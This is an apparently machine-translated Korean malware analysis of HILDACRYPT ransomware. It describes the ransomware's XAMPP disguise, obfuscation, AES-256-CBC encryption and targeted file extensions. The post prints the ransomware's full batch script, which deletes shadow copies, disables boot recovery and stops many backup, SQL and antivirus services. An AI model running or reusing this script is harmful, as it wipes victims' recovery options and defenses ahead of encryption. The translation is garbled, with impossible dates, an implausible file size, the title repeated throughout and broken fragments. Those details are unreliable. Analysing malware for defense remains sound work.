HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

์•ˆ๋…•, ํ•˜๋ธŒ๋ฅด! ๋‹ค์‹œ ํ•œ๋ฒˆ ๋žœ์„ฌ์›จ์–ด ์นดํ…Œ๊ณ ๋ฆฌ์˜ ์ตœ์‹  ๋ฒ„์ „์˜ ๋งฌ์›จ์–ด์— ๋Œ€ํ•ด ์ด์•ผ๊ธฐํ•˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. HILDACRYPT๋Š” 2019๋…„ XNUMX์›”์— ๋ฐœ๊ฒฌ๋œ Hilda ๊ณ„์—ด์˜ ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๋กœ, ์†Œํ”„ํŠธ์›จ์–ด ๋ฐฐํฌ์— ์‚ฌ์šฉ๋œ Netflix ๋งŒํ™”์˜ ์ด๋ฆ„์„ ๋”ฐ์„œ ๋ช…๋ช…๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์˜ค๋Š˜ ์šฐ๋ฆฌ๋Š” ์—…๋ฐ์ดํŠธ๋œ ๋žœ์„ฌ์›จ์–ด ๋ฐ”์ด๋Ÿฌ์Šค์˜ ๊ธฐ์ˆ ์  ํŠน์ง•์— ๋Œ€ํ•ด ์•Œ์•„๊ฐ€๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

Hilda ๋žœ์„ฌ์›จ์–ด์˜ ์ฒซ ๋ฒˆ์งธ ๋ฒ„์ „์—์„œ๋Š” Youtube์— ๊ฒŒ์‹œ๋œ ๋งํฌ ์˜ˆ๊ณ ํŽธ ๋ชธ๊ฐ’ ํŽธ์ง€์—๋Š” ๋งŒํ™” ์‹œ๋ฆฌ์ฆˆ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์—ˆ์Šต๋‹ˆ๋‹ค. HILDACRYPT๋Š” MariaDB, PHP ๋ฐ Perl์„ ํฌํ•จํ•˜๋Š” ์„ค์น˜๊ฐ€ ์‰ฌ์šด Apache ๋ฐฐํฌํŒ์ธ ํ•ฉ๋ฒ•์ ์ธ XAMPP ์„ค์น˜ ํ”„๋กœ๊ทธ๋žจ์œผ๋กœ ๊ฐ€์žฅํ•ฉ๋‹ˆ๋‹ค. ๋™์‹œ์— cryptolocker์˜ ํŒŒ์ผ ์ด๋ฆ„์€ xamp.x์ž…๋‹ˆ๋‹ค. ๊ฒŒ๋‹ค๊ฐ€ ๋žœ์„ฌ์›จ์–ด ํŒŒ์ผ์—๋Š” ์ „์ž์„œ๋ช…์ด ์—†์Šต๋‹ˆ๋‹ค.

์ •์  ๋ถ„์„

๋žœ์„ฌ์›จ์–ด๋Š” MS Windows์šฉ์œผ๋กœ ์ž‘์„ฑ๋œ PE32 .NET ํŒŒ์ผ์— ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ํฌ๊ธฐ๋Š” 135๋ฐ”์ดํŠธ์ž…๋‹ˆ๋‹ค. ๊ธฐ๋ณธ ํ”„๋กœ๊ทธ๋žจ ์ฝ”๋“œ์™€ ๋ฐฉ์–ด์ž ํ”„๋กœ๊ทธ๋žจ ์ฝ”๋“œ๋Š” ๋ชจ๋‘ C#์œผ๋กœ ์ž‘์„ฑ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. ์ปดํŒŒ์ผ ๋‚ ์งœ์™€ ํƒ€์ž„์Šคํƒฌํ”„์— ๋”ฐ๋ฅด๋ฉด ๋ฐ”์ด๋„ˆ๋ฆฌ๋Š” 168๋…„ 14์›” 2019์ผ์— ์ƒ์„ฑ๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

Detect It Easy์— ๋”ฐ๋ฅด๋ฉด ํ•ด๋‹น ๋žœ์„ฌ์›จ์–ด๋Š” Confuser์™€ ConfuserEx๋ฅผ ์‚ฌ์šฉํ•ด ๋ณด๊ด€๋˜์ง€๋งŒ ์ด๋“ค ๋‚œ๋…ํ™” ์žฅ์น˜๋Š” ์ด์ „๊ณผ ๋™์ผํ•˜๋ฉฐ ConfuserEx๋งŒ Confuser์˜ ํ›„์† ์ œํ’ˆ์ด๋ฏ€๋กœ ์ฝ”๋“œ ์„œ๋ช…์ด ์œ ์‚ฌํ•ฉ๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

HILDACRYPT๋Š” ์‹ค์ œ๋กœ ConfuserEx์™€ ํ•จ๊ป˜ ํŒจํ‚ค์ง€๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a

๊ณต๊ฒฉ ๋ฒกํ„ฐ

์•„๋งˆ๋„ ์ด ๋žœ์„ฌ์›จ์–ด๋Š” ํ•ฉ๋ฒ•์ ์ธ XAMPP ํ”„๋กœ๊ทธ๋žจ์œผ๋กœ ๊ฐ€์žฅํ•œ ์›น ํ”„๋กœ๊ทธ๋ž˜๋ฐ ์‚ฌ์ดํŠธ ์ค‘ ํ•˜๋‚˜์—์„œ ๋ฐœ๊ฒฌ๋˜์—ˆ์„ ๊ฐ€๋Šฅ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค.

๊ฐ์—ผ์˜ ์ „์ฒด ์‚ฌ์Šฌ์€ ๋‹ค์Œ์—์„œ ๋ณผ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. app.any.run ์ƒŒ๋“œ๋ฐ•์Šค.

๋‚œ์ฒ˜

๋žœ์„ฌ์›จ์–ด ๋ฌธ์ž์—ด์€ ์•”ํ˜ธํ™”๋œ ํ˜•ํƒœ๋กœ ์ €์žฅ๋ฉ๋‹ˆ๋‹ค. HILDACRYPT๋Š” ์‹คํ–‰๋˜๋ฉด Base64 ๋ฐ AES-256-CBC๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์•”ํ˜ธ๋ฅผ ํ•ด๋…ํ•ฉ๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

์„ค์น˜

์šฐ์„  ๋žœ์„ฌ์›จ์–ด๋Š” %AppDataRoaming%์— GUID(Globally Unique Identifier) โ€‹โ€‹๋งค๊ฐœ๋ณ€์ˆ˜๊ฐ€ ๋ฌด์ž‘์œ„๋กœ ์ƒ์„ฑ๋˜๋Š” ํด๋”๋ฅผ ์ƒ์„ฑํ•ฉ๋‹ˆ๋‹ค. ์ด ์œ„์น˜์— bat ํŒŒ์ผ์„ ์ถ”๊ฐ€ํ•˜๋ฉด ๋žœ์„ฌ์›จ์–ด ๋ฐ”์ด๋Ÿฌ์Šค๋Š” cmd.exe๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ํ•ด๋‹น ํŒŒ์ผ์„ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค.

cmd.exe /c JKfgkgj3hjgfhjka.bat ๋ฐ ์ข…๋ฃŒ

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹คHILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค
๊ทธ๋Ÿฐ ๋‹ค์Œ ๋ฐฐ์น˜ ์Šคํฌ๋ฆฝํŠธ ์‹คํ–‰์„ ์‹œ์ž‘ํ•˜์—ฌ ์‹œ์Šคํ…œ ๊ธฐ๋Šฅ์ด๋‚˜ ์„œ๋น„์Šค๋ฅผ ๋น„ํ™œ์„ฑํ™”ํ•ฉ๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

์ด ์Šคํฌ๋ฆฝํŠธ์—๋Š” ์„€๋„ ๋ณต์‚ฌ๋ณธ์„ ์‚ญ์ œํ•˜๊ณ  SQL ์„œ๋ฒ„, ๋ฐฑ์—… ๋ฐ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๋น„ํ™œ์„ฑํ™”ํ•˜๋Š” ๊ธด ๋ช…๋ น ๋ชฉ๋ก์ด ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

์˜ˆ๋ฅผ ๋“ค์–ด Acronis Backup ์„œ๋น„์Šค๋ฅผ ์ค‘์ง€ํ•˜๋ ค๊ณ  ์‹œ๋„ํ–ˆ์ง€๋งŒ ์‹คํŒจํ–ˆ์Šต๋‹ˆ๋‹ค. ๋˜ํ•œ Veeam, Sophos, Kaspersky, McAfee ๋“ฑ ๊ณต๊ธ‰์—…์ฒด์˜ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค.

@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop โ€œSophos Device Control Serviceโ€ /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop โ€œZoolz 2 Serviceโ€ /y
net stop McTaskManager /y
net stop โ€œSophos AutoUpdate Serviceโ€ /y
net stop โ€œSophos System Protection Serviceโ€ /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop โ€œSymantec System Recoveryโ€ /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop โ€œSophos Health Serviceโ€ /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop โ€œSophos Message Routerโ€ /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop โ€œSophos Clean Serviceโ€ /y
net stop swi_update_64 /y
net stop โ€œSophos Web Control Serviceโ€ /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop โ€œVeeam Backup Catalog Data Serviceโ€ /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop โ€œSophos MCS Clientโ€ /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop โ€œSQLsafe Backup Serviceโ€ /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop โ€œSophos Safestore Serviceโ€ /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop โ€œSophos File Scanner Serviceโ€ /y
net stop โ€œSophos Agentโ€ /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop โ€œEnterprise Client Serviceโ€ /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop โ€œSQL Backupsโ€ /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop โ€œSophos MCS Agentโ€ /y
net stop RESvc /y
net stop โ€œAcronis VSS Providerโ€ /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop โ€œSQLsafe Filter Serviceโ€ /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0

์œ„์—์„œ ์–ธ๊ธ‰ํ•œ ์„œ๋น„์Šค์™€ ํ”„๋กœ์„ธ์Šค๊ฐ€ ๋น„ํ™œ์„ฑํ™”๋˜๋ฉด cryptolocker๋Š” tasklist ๋ช…๋ น์„ ์‚ฌ์šฉํ•˜์—ฌ ์‹คํ–‰ ์ค‘์ธ ๋ชจ๋“  ํ”„๋กœ์„ธ์Šค์— ๋Œ€ํ•œ ์ •๋ณด๋ฅผ ์ˆ˜์ง‘ํ•˜์—ฌ ํ•„์š”ํ•œ ๋ชจ๋“  ์„œ๋น„์Šค๊ฐ€ ์ค‘๋‹จ๋˜์—ˆ๋Š”์ง€ ํ™•์ธํ•ฉ๋‹ˆ๋‹ค.
์ž‘์—… ๋ชฉ๋ก v/fo csv

์ด ๋ช…๋ น์€ ์‹คํ–‰ ์ค‘์ธ ํ”„๋กœ์„ธ์Šค์˜ ์„ธ๋ถ€ ๋ชฉ๋ก์„ ํ‘œ์‹œํ•˜๋ฉฐ, ํ•ด๋‹น ์š”์†Œ๋Š” "," ๊ธฐํ˜ธ๋กœ ๊ตฌ๋ถ„๋ฉ๋‹ˆ๋‹ค.
ยซยซcsrss.exeยป,ยซ448ยป,ยซservicesยป,ยซ0ยป,ยซ1๏ฟฝ896 ๏ฟฝ๏ฟฝยป,ยซunknownยป,ยป๏ฟฝ/๏ฟฝยป,ยซ0:00:03ยป,ยป๏ฟฝ/๏ฟฝยปยป

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

์ด ํ™•์ธ ํ›„ ๋žœ์„ฌ์›จ์–ด๋Š” ์•”ํ˜ธํ™” ํ”„๋กœ์„ธ์Šค๋ฅผ ์‹œ์ž‘ํ•ฉ๋‹ˆ๋‹ค.

์•”ํ˜ธํ™”

ํŒŒ์ผ ์•”ํ˜ธํ™”

HILDACRYPT๋Š” Recycle.Bin ๋ฐ Reference AssembliesMicrosoft ํด๋”๋ฅผ ์ œ์™ธํ•˜๊ณ  ํ•˜๋“œ ๋“œ๋ผ์ด๋ธŒ์—์„œ ๋ฐœ๊ฒฌ๋œ ๋ชจ๋“  ๋‚ด์šฉ์„ ๊ฒ€์‚ฌํ•ฉ๋‹ˆ๋‹ค. ํ›„์ž์—๋Š” ๋žœ์„ฌ์›จ์–ด ์ž‘๋™์— ์˜ํ–ฅ์„ ๋ฏธ์น  ์ˆ˜ ์žˆ๋Š” .Net ์• ํ”Œ๋ฆฌ์ผ€์ด์…˜์šฉ ์ค‘์š”ํ•œ dll, pdb ๋“ฑ์˜ ํŒŒ์ผ์ด ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค. ์•”ํ˜ธํ™”ํ•  ํŒŒ์ผ์„ ๊ฒ€์ƒ‰ํ•˜๋ ค๋ฉด ๋‹ค์Œ ํ™•์žฅ์ž ๋ชฉ๋ก์ด ์‚ฌ์šฉ๋ฉ๋‹ˆ๋‹ค.

ยซ.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.mdยป

๋žœ์„ฌ์›จ์–ด๋Š” AES-256-CBC ์•Œ๊ณ ๋ฆฌ์ฆ˜์„ ์‚ฌ์šฉํ•˜์—ฌ ์‚ฌ์šฉ์ž ํŒŒ์ผ์„ ์•”ํ˜ธํ™”ํ•ฉ๋‹ˆ๋‹ค. ํ‚ค ํฌ๊ธฐ๋Š” 256๋น„ํŠธ์ด๊ณ  IV(์ดˆ๊ธฐํ™” ๋ฒกํ„ฐ) ํฌ๊ธฐ๋Š” 16๋ฐ”์ดํŠธ์ž…๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

๋‹ค์Œ ์Šคํฌ๋ฆฐ์ƒท์—์„œ๋Š” GetBytes()๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ byte_2 ๋ฐ byte_1์˜ ๊ฐ’์„ ๋ฌด์ž‘์œ„๋กœ ์–ป์—ˆ์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

์—ด์‡ 

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

๊ณผ์—์„œ

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์˜ ํ™•์žฅ์ž๋Š” HCY!์ž…๋‹ˆ๋‹ค. ์ด๊ฒƒ์€ ์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์˜ ์˜ˆ์ž…๋‹ˆ๋‹ค. ์œ„์—์„œ ์–ธ๊ธ‰ํ•œ ํ‚ค์™€ IV๋Š” ์ด ํŒŒ์ผ์šฉ์œผ๋กœ ์ƒ์„ฑ๋˜์—ˆ์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

ํ‚ค ์•”ํ˜ธํ™”

cryptolocker๋Š” ์ƒ์„ฑ๋œ AES ํ‚ค๋ฅผ ์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์— ์ €์žฅํ•ฉ๋‹ˆ๋‹ค. ์•”ํ˜ธํ™”๋œ ํŒŒ์ผ์˜ ์ฒซ ๋ฒˆ์งธ ๋ถ€๋ถ„์—๋Š” XML ํ˜•์‹์˜ HILDACRYPT, KEY, IV, FileLen๊ณผ ๊ฐ™์€ ๋ฐ์ดํ„ฐ๊ฐ€ ํฌํ•จ๋œ ํ—ค๋”๊ฐ€ ์žˆ์œผ๋ฉฐ ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค.

HILDACRYPT: ์ƒˆ๋กœ์šด ๋žœ์„ฌ์›จ์–ด๊ฐ€ ๋ฐฑ์—… ์‹œ์Šคํ…œ๊ณผ ๋ฐ”์ด๋Ÿฌ์Šค ๋ฐฑ์‹  ์†”๋ฃจ์…˜์„ ๊ณต๊ฒฉํ•ฉ๋‹ˆ๋‹ค

